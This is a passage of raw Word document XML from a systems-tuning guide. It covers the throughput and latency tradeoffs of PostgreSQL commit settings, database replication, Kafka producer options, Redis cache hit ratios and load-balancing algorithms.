              <w:t>synchronous_commit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BED53A" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>off (batch commits, risk data loss)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06F2F5" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>on (fsync every commit)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="6DEE08E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20AD8A" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>work_mem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AE5236" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Higher (fewer disk sorts) but fewer concurrent queries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94BB9C" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Lower (more concurrent queries)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="17505C0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D8F084" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>max_connections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8FED5E" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Higher (more concurrent clients) but more context switching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91FAD3" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Lower (less switching)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="649EB95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E73730" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>checkpoint_completion_target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3CDA38" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Higher (spread writes, less I/O spikes)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8C6F82" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Lower (faster checkpoints)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="393CB1D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3A67F9" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:lastRenderedPageBreak/>
              <w:t>commit_delay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B39BF7" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Higher (batch more commits together)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732AC6" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>0 (commit immediately)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="687E6821" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>synchronous_commit = off example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546DA596" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D763F0A" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>ON:  Each commit waits for disk flush → 2–5ms per commit → max ~200–500 TPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5D2A6B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>OFF: Commits return immediately, flush in background → &lt;1ms → 10,000+ TPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D30FECB" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Risk: Last ~100ms of commits may be lost on crash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BABAD3B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Read replicas (throughput vs. consistency):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54217119" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FC9C8F" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Sync replication:  Write confirmed after ALL replicas acknowledge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730ED092" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  → Latency: write_time + max(replica_RTT) (slower writes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A645AD7" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  → Throughput: limited by slowest replica</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16FDAFDE" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  → Consistency: strong</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D508F3F" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="3694352F" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Async replication: Write confirmed immediately, replicated in background</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC928FC" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  → Latency: write_time only (fast!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36362E61" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  → Throughput: limited by primary only</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579E0931" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  → Consistency: eventual (replicas lag by ms–seconds)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D3815A" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.2 Message Queues</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211650C2" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kafka throughput vs. latency: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375"/>
        <w:gridCol w:w="3553"/>
        <w:gridCol w:w="3422"/>
      </w:tblGrid>
      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="38DB7A5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24EE00" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F1994">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Setting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CB79CC" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F1994">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Throughput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0C746E" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F1994">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Latency</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="600A1DA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F09E3D" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>linger.ms = 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F36D10" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Lower (one message per batch)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ABF607" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Lowest (send immediately)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="1CBEC81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201822" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:lastRenderedPageBreak/>
              <w:t>linger.ms = 50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4AC9D0" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Higher (batch messages for 50ms)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2CF4FA" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>+50ms per message</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="46757B3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0E7604" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>batch.size = 16KB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D24D9E" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Moderate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F8A240" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Moderate</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="1055489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03F014" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>batch.size = 1MB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1DEA9C" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>High (fewer, larger network writes)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BE371F" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Higher (waiting to fill batch)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="7D315D0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CDFE9A" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>acks = 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AD3390" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Highest (fire and forget)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9FD814" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Lowest (no waiting)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="7245904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CA55EA" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>acks = 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4EEEC4" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>High (wait for leader only)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2A993C" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Moderate</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="4C3DA26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BDBD66" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>acks = all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17F3C2" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Lower (wait for all replicas)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EF1D24" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Highest</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="3C4E96B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8B34D5" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>compression = none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76C82A" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Lower (more network I/O)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E9C59A" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Lower (no CPU for compression)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="5011AEE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F7AD96" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>compression = lz4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CB308E" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Higher (less network I/O)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1281FE" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Slightly higher (CPU cost)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="516FFEFA" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Kafka throughput-latency curve:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5095B0F5" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B295AD" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>linger.ms=0, acks=1:  Latency ~5ms, Throughput ~100K msg/s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7324CC2F" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>linger.ms=5, acks=1:  Latency ~10ms, Throughput ~500K msg/s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BA2C12" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>linger.ms=50, acks=all: Latency ~100ms, Throughput ~1M msg/s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32399844" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.3 Caching</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6693277E" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cache hit: low latency + high throughput</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365EEEDB" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FE187A" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Redis GET: 0.1–0.5ms latency, 100K–300K ops/sec per node</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FE071E" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cache miss: high latency + lower throughput</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6463DB0B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D72A55" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:lastRenderedPageBreak/>
        <w:t>Miss → Database call: 5–50ms latency, limited by DB capacity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7FE9F4" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cache hit ratio directly connects throughput and latency:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683EFEC5" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C0B032" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>90% hit ratio:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223445D5" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Average latency = 0.9 × 0.5ms + 0.1 × 20ms = 2.45ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A67C3C9" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Effective throughput: DB handles 10% of traffic → 10x effective scaling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CED3D5" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="5EA155BD" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>99% hit ratio:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6318D0" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Average latency = 0.99 × 0.5ms + 0.01 × 20ms = 0.695ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABBC5A4" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Effective throughput: DB handles 1% → 100x effective scaling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409A1BF0" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.4 Load Balancers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732EAD96" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Load balancing algorithm effects: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609"/>
        <w:gridCol w:w="2871"/>
        <w:gridCol w:w="3870"/>
      </w:tblGrid>
      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="3626751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C646CE" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F1994">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Algorithm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973BA8" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F1994">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Throughput Impact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D86850" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F1994">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Latency Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="65986A4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66DDC0" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Round-robin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560C42" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Even distribution, good throughput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20FD0B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Ignores backend load → some get slow servers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="779FFB6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3148F5" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Least connections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C8B6D2" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Adaptive, avoids slow backends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1A6BA3" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Better tail latency (routes away from loaded backends)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="04EABB1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7D2258" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Weighted round-robin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9B6828" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Accounts for backend capacity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F7865E" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Static — doesn't adapt to real-time load</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="0EA2D0A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17127B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Power of two random choices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2CBEF7" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Near-optimal distribution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A6F21B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Low latency (avoids hotspots with minimal overhead)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
